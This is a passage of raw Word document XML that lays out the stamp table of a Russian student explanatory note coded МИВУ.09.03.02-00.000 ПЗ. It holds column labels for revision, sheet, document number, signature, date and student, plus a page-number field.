        <w:p w14:paraId="716D894D" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="123935B4" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="004B538F" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
          </w:r>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
          <w:r w:rsidRPr="004B538F">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="002674A5" w14:paraId="17E9B69B" w14:textId="77777777" w:rsidTr="00352169">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="398" w:type="dxa"/>
          <w:tcBorders>
            <w:left w:val="nil"/>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="72592D40" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Изм</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6229D46D" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="79C75441" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>№ докум.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6EF828B6" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Подп.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="413ECBEC" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="498"/>
            </w:tabs>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Дата</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6067" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="2121F5AD" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:bottom w:val="nil"/>
            <w:right w:val="nil"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="2EDAB8A1" w14:textId="77777777" w:rsidR="002674A5" w:rsidRPr="00984376" w:rsidRDefault="002674A5" w:rsidP="002674A5">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="09AB43D1" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00444D35" w:rsidRDefault="00FA5930" w:rsidP="002674A5">
    <w:pPr>
      <w:pStyle w:val="a5"/>
      <w:rPr>
        <w:sz w:val="32"/>
        <w:szCs w:val="3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433" w:type="dxa"/>
      <w:tblInd w:w="-284" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:insideV w:val="single" w:sz="12" w:space="0" w:color="auto"/>
      </w:tblBorders>
      <w:tblLayout w:type="fixed"/>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
      <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
    </w:tblPr>
    <w:tblGrid>
      <w:gridCol w:w="394"/>
      <w:gridCol w:w="564"/>
      <w:gridCol w:w="1297"/>
      <w:gridCol w:w="844"/>
      <w:gridCol w:w="564"/>
      <w:gridCol w:w="3947"/>
      <w:gridCol w:w="283"/>
      <w:gridCol w:w="283"/>
      <w:gridCol w:w="283"/>
      <w:gridCol w:w="959"/>
      <w:gridCol w:w="1015"/>
    </w:tblGrid>
    <w:tr w:rsidR="00FA5930" w14:paraId="2ACD019A" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="397" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="56BB735A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="7045245A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="279076AD" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="6C258690" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="76A83998" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6806" w:type="dxa"/>
          <w:gridSpan w:val="6"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="2EB68304" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00751F4F" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:right="144"/>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="40"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>МИВУ.09.03.02-00.000         ПЗ</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00FA5930" w14:paraId="4854CF7A" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="397" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="15C33FEC" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="7E780571" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="5D75AF8B" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="06DC4C21" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4C613F4A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6806" w:type="dxa"/>
          <w:gridSpan w:val="6"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="49C5E7A7" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00FA5930" w14:paraId="24F0E539" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="397" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="78A8650A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Изм</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6F393C26" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Лист</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="01C5600A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>№ докум.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="0C021835" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Подп.</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="4767620D" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Дата</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="6806" w:type="dxa"/>
          <w:gridSpan w:val="6"/>
          <w:vMerge/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="6429716A" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00FA5930" w14:paraId="4BCE3E64" w14:textId="77777777" w:rsidTr="00907A58">
      <w:trPr>
        <w:trHeight w:hRule="exact" w:val="284"/>
      </w:trPr>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="964" w:type="dxa"/>
          <w:gridSpan w:val="2"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="48967CE5" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t>Студент</w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="1304" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="50423814" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:ind w:left="57"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="849" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="176E3DC5" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="567" w:type="dxa"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
        </w:tcPr>
        <w:p w14:paraId="7B44749F" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="008041DB">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
              <w:szCs w:val="20"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3969" w:type="dxa"/>
          <w:vMerge w:val="restart"/>
          <w:tcBorders>
            <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          </w:tcBorders>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="0C3AF199" w14:textId="77777777" w:rsidR="00FA5930" w:rsidRPr="00984376" w:rsidRDefault="00FA5930" w:rsidP="00751F4F">
          <w:pPr>
            <w:pStyle w:val="a5"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="20"/>
